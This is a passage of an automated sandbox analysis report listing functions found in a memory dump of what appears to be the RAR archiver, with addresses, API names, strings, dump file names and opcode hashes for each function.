                                                                                                                                                                                                                                        • Instruction ID: a740b9073bda232986be3210b77674d34ac57c60ed5feaa72f9f48222ef55186
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B318136619B81D6E7608F11B44469A77A5FB887E4F004336EAA943BD4DF3CD9568B00
                                                                                                                                                                                                                                        Function 00007FF6AA188884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: CMT
                                                                                                                                                                                                                                        • API String ID: 0-2756464174
                                                                                                                                                                                                                                        • Opcode ID: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                                                                                                                                                                                                        • Instruction ID: ac1e8b54c6d729dcbb051c20439081ed94d0576b99339f4e35f92658e796e7a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a16dee74380204c9c30fa4e199fe9bf2e4989a6c72111b3352134e7331b26900
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77D1D562A1A692E1EA22DB25D4501BD63A1FF89BC0F4445B3DA5E877D9DF3CE943C300
                                                                                                                                                                                                                                        Function 00007FF6AA1E86D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6AA1E8704
                                                                                                                                                                                                                                          • Part of subcall function 00007FF6AA1E4E3C: GetCurrentProcess.KERNEL32(00007FF6AA1E9CC5), ref: 00007FF6AA1E4E69
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                        • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                        • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                        • Instruction ID: 40ab94ce6a2a5e42b8a07fa182282d563d120987439694395325dbc073f9e64a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4251F362F16A95D5EB22DFA298004BC67A5FB4ABD8B444532DE4D97F85DF3CD8428300
                                                                                                                                                                                                                                        Function 00007FF6AA1CB340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3429775523-0
                                                                                                                                                                                                                                        • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                        • Instruction ID: 9657c3d8a706b2c8c94c151d13b363c4717d2df711ab857e8792b2359d5ed842
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4111672B14641DAEB108FB6E8912AE7BB0FB48748F40153ADA8E93A58DF3CD545CB04
                                                                                                                                                                                                                                        Function 00007FF6AA19CAFC Relevance: 3.0, APIs: 2, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                                                                                        • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                        • Instruction ID: 8c9895fb446368f5a831919edaa5eef8d3e6f8108df031b23380852662320aa0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9F05421B08781D7E3118F16B54011AE7A4FF85BD4F048175EA8993B58DF7CC9528704
                                                                                                                                                                                                                                        Function 00007FF6AA1A3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1705453755-0
                                                                                                                                                                                                                                        • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                        • Instruction ID: 0eab96005cf1572ec36766762bf72370391e0c0f7d11bcd0182ff83520347625
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8014C72629681D7EB71DB15E4513AAB3A1FB84744F800572E68CC2688DF3CEA0ACF40
                                                                                                                                                                                                                                        Function 00007FF6AA1E6130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                        • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                        • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                        • Instruction ID: 46e5c70b22f794b8bd3625baed61c06048e66baba98430e4d9606cd2bd3c2322
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F941BD32B0AB85E9E712CF64E8417AD37A4EB05398F40417BEE5C87B95DE3CD8268344
                                                                                                                                                                                                                                        Function 00007FF6AA197988 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1039280553-0
                                                                                                                                                                                                                                        • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                        • Instruction ID: ea59f2685efaec65aa8febbacdfcb90fa276792341e02f3cf9742976fe541d95
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E121C225B1A682EBEA429F21A90013D6361FF89BA0F140177EE4A43764EE3CED47C700
                                                                                                                                                                                                                                        Function 00007FF6AA1D0140 Relevance: 12.2, APIs: 8, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 932687459-0
                                                                                                                                                                                                                                        • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                        • Instruction ID: d380af119c4e695a3c2865de6a9bc111d290fc5337397174922b7a4fbb1debb7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E281C422A0EA82E5FB529A11E5503BD63E0EB44B94F184176DA4E87B99DF7CED43C304
                                                                                                                                                                                                                                        Function 00007FF6AA18C468 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 420COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                                                        • String ID: ;%u$x%u$xc%u
                                                                                                                                                                                                                                        • API String ID: 233258989-2277559157
                                                                                                                                                                                                                                        • Opcode ID: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                        • Instruction ID: 4ceb676b30e12bde186a62a54c6f679062416b124708392d7c2ad5afb456544b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18e8202548affe00674286321b5f124759c48e138fb2ddf063aaae7488dbebd7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B002B022B0A682E5EA27DA2191453FE6352EF49780F4400B7DA8EC7792DE7DEC47C701
                                                                                                                                                                                                                                        Function 00007FF6AA1A1634 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA20A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA214000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA21E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321365287.00007FF6AA226000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321490829.00007FF6AA228000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321560124.00007FF6AA22E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_70_2_7ff6aa180000_rar.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileMoveNamePath$CompareLongShortStringswprintf
                                                                                                                                                                                                                                        • String ID: rtmp%d
                                                                                                                                                                                                                                        • API String ID: 2308737092-3303766350
                                                                                                                                                                                                                                        • Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                        • Instruction ID: 93261ee3b625b85754c4a3d14f33d427e9f641085e3deb7516f2af7229279447
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25519022A1A5D6E4EA72AF21D8011FD6351BF40BC4F455177D94DCBA9ADE3CEE0AC300
                                                                                                                                                                                                                                        Function 00007FF6AA1CB650 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000046.00000002.2321214220.00007FF6AA181000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF6AA180000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321184582.00007FF6AA180000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321268493.00007FF6AA1F0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321308042.00007FF6AA208000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000046.00000002.2321339848.00007FF6AA209000.00000008.00000001.01000000.0000001A.sdmpDownload File
